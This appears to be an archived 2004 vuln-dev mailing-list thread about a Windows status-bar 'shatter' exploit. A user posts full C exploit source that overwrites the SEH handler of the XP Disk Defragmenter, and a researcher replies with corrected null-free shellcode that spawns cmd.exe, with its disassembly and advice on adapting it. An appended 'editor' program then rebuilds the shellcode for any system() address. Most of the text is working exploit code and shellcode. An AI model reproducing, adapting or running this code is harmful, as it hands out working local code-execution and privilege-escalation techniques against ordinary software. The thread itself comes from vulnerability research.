Vulnerability Development: RE: status-bar SHATTER attack

RE: status-bar SHATTER attack

From: Brett Moore <brett.moore_at_security-assessment.com>
Date: Thu, 8 Jul 2004 10:29:54 +1200

Hey,

> can anyone pls point me where i'm wrong ??
Sure

Original demo states
// Local No Null Cmd Shellcode.

This is because you can't send 0x00 with this statusbar exploit

Your shellcode contains nulls.

Try this code, which is updated to use a system address of 0x77c28044:

= "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\xe1\x12\x5e\x77\x03\xd9\xff\xd3\xcc\x90";

And remove your code that plugs the address into the shellcode.

Or you can be smart and keep your shellcode modification code but update it
so it affects the shellcode correctly.

_exploit
00408030 90 nop
00408031 33 C9 xor ecx,ecx
00408033 66 B9 36 32 mov cx,3236h
00408037 C1 E1 09 shl ecx,9
0040803A 66 B9 63 6D mov cx,6D63h
0040803E 51 push ecx
0040803F 54 push esp
00408040 BB 5C 21 9D 77 mov ebx,775e125eh
00408045 03 D9 add ebx,ecx
00408047 FF D3 call ebx
00408049 CC int 3

So grab the address of system and subtract 0x646DE6 (cmd) then place into
the byte array.
or
Remove the add ebx,ecx bytes and just put the proc address straight in
or
write your own shellcode, pretty sure I did it this way because at the time
system had a null in its address.

Either way, the code you sent works fine with that updated shellcode.

Be sure to grab my shatter presentation+code from the Blackhat site after
the conference if this stuff interests you. It will contain previously
unreleased information and techniques.

Brett Moore
Network Intrusion Specialist, CTO
Security-Assessment.com Ltd
www.security-assessment.com

-----Original Message-----
From: bil_912 [mailto:bil_912_at_coolgoose.com]
Sent: Thursday, July 08, 2004 10:00 AM
To: vuln-dev_at_securityfocus.com
Subject: status-bar SHATTER attack

>
>
> hello all,
>
> recently i was playing with >> STATUS-BAR <<
shatter-attack-code provided
> by brett.moore_at_security-assessment.com
>
> the code with tiny modifications is attached here.
>
> the problem is ...
>
> xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten as 0x77ed74c0 where my
> shellcode is residing.
>
> but even after that the code didn't get executed. i was attacking the
> "disk defragmenter" utility which comes with windows XP.
>
> can anyone pls point me where i'm wrong ??
>
> thank u.
>
> [ i'm attaching a screen-shot of my desktop when attacking ]
>
>
> //=========================================================================
> /***************************************************************************
> * Statusbar Control Shatter exploit
> *
> * Demonstrates the use of a combination of windows messages to:
> * - brute force a useable heap address
> * - place structure information inside a process
> * - inject shellcode to known location
> * - overwrite 4 bytes of a critical memory address
> *
> * 4 Variables need to be set for proper execution.
> * - tWindow is the title of the programs main window
> * - sehHandler is the critical address to overwrite
> * - shellcodeaddr is the data space to inject the code
> * - heapaddr is the base heap address to start brute forcing
> *
> * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
> * Try it out against any program with a progress bar
> *
> ***************************************************************************/
>
> #include <windows.h>
> #include <commctrl.h>
> #include <stdio.h>
> #include <stdlib.h>   // exit()
> #include <conio.h>    // getch()
>
> // Local No Null Cmd Shellcode.
> BYTE exploit[] ="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
>
> char g_classNameBuf[ 256 ];
> char tWindow[]="disk defragmenter";
>
> long sehHandler = 0x77ed73b4; // Critical Address To Overwrite
> long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space
> unsigned long heapaddr = 0x00100000; // Base Heap Address
> long mainhWnd;
>
> void doWrite(HWND hWnd, long tByte,long address);
> void BruteForceHeap(HWND hWnd);
> void IterateWindows(long hWnd);
>
> int main(int argc, char *argv[])
> {
>
> HMODULE hMod;
> DWORD ProcAddr;
> long x;
>
>
> //making the shellcode ready
> hMod = LoadLibrary("msvcrt.dll");
> ProcAddr = (DWORD)GetProcAddress(hMod, "system");
> if(ProcAddr != 0)
> *(long *)&exploit[8] = ProcAddr;
> //***************************
>
> //printf("+ Enter Window Title\n",tWindow);
> //flushall();
> //gets(tWindow);
>
>
>
> if (argc == 2)
> sscanf(argv[1],"%lx",&heapaddr);// Oddity
>
> printf("%% Using base heap address...0x%xh\n",heapaddr);
> printf("+ Finding %s Window...\n",tWindow);
> mainhWnd = (long)FindWindow(NULL,tWindow);
>
> if(mainhWnd == NULL)
> {
> printf("+ Couldn't Find %s Window\n",tWindow);
> return 0;
> }
> printf("+ Found Main Window At......0x%xh\n",mainhWnd);
> IterateWindows(mainhWnd);
> printf("+ Done...\n");
>
> return 0;
> }
>
>
> void IterateWindows(long hWnd)
> {
>
> long childhWnd,looper;
>
> childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
> while (childhWnd != NULL)
> {
> IterateWindows(childhWnd);
> childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
> }
>
> GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
> if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
> {
>
> // Find Heap Address
> BruteForceHeap((HWND) hWnd);
> //printf("+ Enter heapaddr : \n");
> //scanf("%lx",&heapaddr);
>
> // Inject shellcode to known address
> printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
> for (looper=0;looper<sizeof(exploit);looper++)
> doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
> // Overwrite SEH
> printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
>
>
> doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
>
>
>
> // Cause exception
> printf("+ Forcing Unhandled Exception\n");
> getch();
>
> // lParam = 1 is not a valid pointer, so the control faults and SEH runs
> SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESS_BAR
> SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
>
> printf("+ Done...\n");
> exit(0);
> }
> }
>
> void BruteForceHeap(HWND hWnd)
> {
> long retval;
> BOOL foundHeap = FALSE;
> char buffer[5000];
> memset(buffer,0,sizeof(buffer));
>
> while (!foundHeap)
> {
> printf("+ Trying Heap Address.......0x%xh ",heapaddr);
>
> memset(buffer,0x58,sizeof(buffer)-1); // setting to X
>
> // Set Window Title
> SendMessage((HWND) mainhWnd,(UINT) WM_SETTEXT,0,(LPARAM)buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,(LPARAM)heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> printf("%d",retval);
>
> if(retval == 1)
> {
> // First Retval should be 1
> memset(buffer,0x80,sizeof(buffer)-1);
> // Set Window Title
> SendMessage((HWND) mainhWnd,(UINT) WM_SETTEXT,0,(LPARAM)buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,(LPARAM)heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> if(retval > 1)
> {
> // Second should be larger than 1
> printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
> return;
> }
> }
> printf("\n");
> heapaddr += 2500;
> }
> }
>
>
> // Writes four copies of tByte at address..address+3: the title buffer
> // (tByte repeated) lives at heapaddr, SB_SETPARTS reads one int from it
> // as the part edge, and SB_GETPARTS copies that int out to address.
> void doWrite(HWND hWnd, long tByte,long address)
> {
> char buffer[5000];
>
> memset(buffer,0,sizeof(buffer));
> memset(buffer,tByte,sizeof(buffer)-1);
> // Set Window Title
> SendMessage((HWND) mainhWnd,(UINT) WM_SETTEXT,0,(LPARAM)buffer);
>
> // Set Statusbar width
> SendMessage( hWnd,(UINT) SB_SETPARTS,1,(LPARAM)heapaddr);
> SendMessage( hWnd,(UINT) SB_GETPARTS,1,(LPARAM)address);
>
> }
>
>
> //=========================================================================

######################################################################
CONFIDENTIALITY NOTICE:

This message and any attachment(s) are confidential and proprietary.
They may also be privileged or otherwise protected from disclosure. If
you are not the intended recipient, advise the sender and delete this
message and any attachment from your system. If you are not the
intended recipient, you are not authorised to use or copy this message
or attachment or disclose the contents to any other person. Views
expressed are not necessarily endorsed by Security-Assessment.com
Limited. Please note that this communication does not designate an
information system for the purposes of the New Zealand Electronic
Transactions Act 2003.
######################################################################
Received on Jul 08 2004
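The null-free shellcode trick from the reply, and the four-byte write that doWrite() relies on, as an added worked example. This is editor's code, not from either post in this thread. It rebuilds the 27-byte shellcode for any 32-bit address of system() by patching only the "mov ebx" immediate, checks the result for 0x00 bytes, replays the register arithmetic to confirm the call lands on system() with "cmd\0" pushed, and models the SB_GETPARTS write on a plain byte array. Assumptions: the opcode layout is taken from the disassembly in the reply; SB_GETPARTS with one part is modelled as copying one int (four copies of the byte) to the target address; the 64-byte arena, the offset 16, and the names reply_sc, original_sc, build_shellcode, trace_call_target, reply_bytes_match and injection_spill are the editor's. No Windows API is called, so it compiles and runs anywhere.

```c
/* Added example (editor's code, not from either post): rebuilds the reply's
 * null-free "cmd"/system() shellcode for any 32-bit system() address, checks
 * it for 0x00 bytes, replays its register arithmetic, and models the one-int
 * SB_GETPARTS write that doWrite() turns into a byte-at-a-time primitive. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CMD_DWORD 0x00646D63u  /* "cmd\0" as a little-endian dword */
#define SC_LEN    27
#define IMM_OFF   17           /* imm32 of "mov ebx,imm32" (0xBB sits at 16) */
#define MEM_SIZE  64           /* size of the modelled target memory (assumed) */

/* Opcode layout taken from the disassembly in the reply; imm32 patched later. */
static const uint8_t sc_template[SC_LEN] = {
    0x90,                    /* nop                                     */
    0x33, 0xC9,              /* xor  ecx,ecx                            */
    0x66, 0xB9, 0x36, 0x32,  /* mov  cx,0x3236                          */
    0xC1, 0xE1, 0x09,        /* shl  ecx,9     -> 0x00646C00            */
    0x66, 0xB9, 0x63, 0x6D,  /* mov  cx,0x6D63 -> 0x00646D63 = "cmd\0"  */
    0x51,                    /* push ecx       ("cmd\0" onto the stack) */
    0x54,                    /* push esp       (char * to "cmd")        */
    0xBB, 0, 0, 0, 0,        /* mov  ebx,imm32 (system - "cmd\0")       */
    0x03, 0xD9,              /* add  ebx,ecx   -> system                */
    0xFF, 0xD3,              /* call ebx                                */
    0xCC, 0x90 };            /* int  3 ; nop                            */
/* Bytes the reply gives for system() at 0x77c28044. */
static const uint8_t reply_sc[SC_LEN] = {
    0x90, 0x33, 0xC9, 0x66, 0xB9, 0x36, 0x32, 0xC1, 0xE1, 0x09, 0x66, 0xB9,
    0x63, 0x6D, 0x51, 0x54, 0xBB, 0xE1, 0x12, 0x5E, 0x77, 0x03, 0xD9, 0xFF,
    0xD3, 0xCC, 0x90 };
/* exploit[] from the original post: "push 'cmd\0'" (68 63 6d 64 00) carries a null. */
static const uint8_t original_sc[15] = { 0x90, 0x68, 0x63, 0x6D, 0x64, 0x00, 0x54,
    0xB9, 0xC3, 0xAF, 0x01, 0x78, 0xFF, 0xD1, 0xCC };

int has_null(const uint8_t *p, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++) if (p[i] == 0) return 1;
    return 0;
}

/* Patch imm32 so that imm32 + "cmd\0" == system_addr (that is what add ebx,ecx
 * computes). Returns 0, or -1 if a 0x00 byte remains (pick another addend). */
int build_shellcode(uint32_t system_addr, uint8_t out[SC_LEN])
{
    uint32_t base = system_addr - CMD_DWORD;
    memcpy(out, sc_template, SC_LEN);
    out[IMM_OFF + 0] = (uint8_t)base;
    out[IMM_OFF + 1] = (uint8_t)(base >> 8);
    out[IMM_OFF + 2] = (uint8_t)(base >> 16);
    out[IMM_OFF + 3] = (uint8_t)(base >> 24);
    return has_null(out, SC_LEN) ? -1 : 0;
}

/* Replay the template's arithmetic from its encoded immediates. Returns the
 * call target (ebx); *pushed receives the dword that "push ecx" stores. */
uint32_t trace_call_target(const uint8_t sc[SC_LEN], uint32_t *pushed)
{
    uint32_t ecx = 0, imm;
    ecx = (ecx & 0xFFFF0000u) | sc[5] | (uint32_t)sc[6] << 8;    /* mov cx,imm16 */
    ecx <<= sc[9];                                                /* shl ecx,imm8 */
    ecx = (ecx & 0xFFFF0000u) | sc[12] | (uint32_t)sc[13] << 8;  /* mov cx,imm16 */
    imm = sc[17] | (uint32_t)sc[18] << 8 | (uint32_t)sc[19] << 16
        | (uint32_t)sc[20] << 24;                                 /* mov ebx,imm32 */
    if (pushed) *pushed = ecx;
    return imm + ecx;                                             /* add ebx,ecx */
}

/* 1 if building for 0x77c28044 reproduces the reply's bytes exactly. */
int reply_bytes_match(void)
{
    uint8_t sc[SC_LEN];
    return build_shellcode(0x77c28044u, sc) == 0 && memcmp(sc, reply_sc, SC_LEN) == 0;
}

/* doWrite() model: SB_SETPARTS reads one int from the title buffer (byte b
 * repeated), SB_GETPARTS copies it out, so each call lands four copies of b at
 * addr..addr+3. Injects sc at offset 16 of a zeroed arena like the loop in
 * IterateWindows(); returns bytes disturbed past the end, -1 if sc is corrupted. */
int injection_spill(const uint8_t *sc, size_t n, int ascending)
{
    uint8_t mem[MEM_SIZE] = {0};
    const size_t base = 16;
    size_t i, spill = 0;
    if (n == 0 || base + n + 3 > MEM_SIZE) return -1;
    for (i = 0; i < n; i++) {
        size_t k = ascending ? i : n - 1 - i;  /* walk addresses up or down */
        memset(mem + base + k, sc[k], 4);      /* the four-byte write */
    }
    if (memcmp(mem + base, sc, n) != 0) return -1;
    for (i = base + n; i < MEM_SIZE; i++) if (mem[i] != 0) spill++;
    return (int)spill;
}

int main(void)
{
    uint32_t pushed, target = trace_call_target(reply_sc, &pushed);
    printf("nulls: original %d, reply %d; reply bytes reproduced: %d\n",
           has_null(original_sc, 15), has_null(reply_sc, SC_LEN), reply_bytes_match());
    printf("call 0x%08x, pushed 0x%08x (\"%.4s\" on little-endian)\n",
           target, pushed, (const char *)&pushed);
    printf("spill walking up: %d, walking down: %d\n",
           injection_spill(reply_sc, SC_LEN, 1), injection_spill(reply_sc, SC_LEN, 0));
    return 0;
}
```

Build with any C compiler and run. injection_spill() returning 3 for the upward walk and -1 for the downward one is the point of the second half: the loop in IterateWindows() only works because each doWrite() repairs the three bytes its predecessor spilled, and the three bytes after the injected code (and after the four SEH-pointer writes) are clobbered anyway, so shellcodeaddr needs to sit where that spill is harmless. build_shellcode() returning -1 is the case the reply mentions from an earlier build, where system() itself had a null in its address; the fix then is a different addend, not a different template.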
